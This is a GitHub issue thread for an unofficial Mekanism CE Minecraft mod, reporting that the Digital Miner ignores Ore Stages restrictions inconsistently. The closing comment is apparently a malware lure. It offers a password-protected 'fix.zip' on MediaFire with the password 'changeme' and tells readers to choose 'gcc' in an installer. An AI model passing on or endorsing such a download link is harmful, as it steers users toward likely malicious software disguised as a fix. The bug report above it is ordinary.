### ISSUE TITLE
The Digital Miner cannot properly mine blocks that are restricted by the Ore Stages mod

### ISSUE THREAD

**Issue by EdwinYoungSteve** [sddsd2332/Mekanism-CE-Unofficial-1.12.2#66]
The Digital Miner cannot properly mine blocks that are restricted by the Ore Stages mod.
Sometimes it will follow the normal logic of the mek mod and can mine advanced ore regardless of any stage; 
Sometimes, it is limited by gamestage and can only get stones that are replaced in the configuration (such as netherrack).

You can make some adjustments in the source code of the mod so that the digital miner generates fake players in the same stages as the owner of the machine
if you can add an additional configuration to limit the mining level of the digital miner, that would be great!

VERY THANKS

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
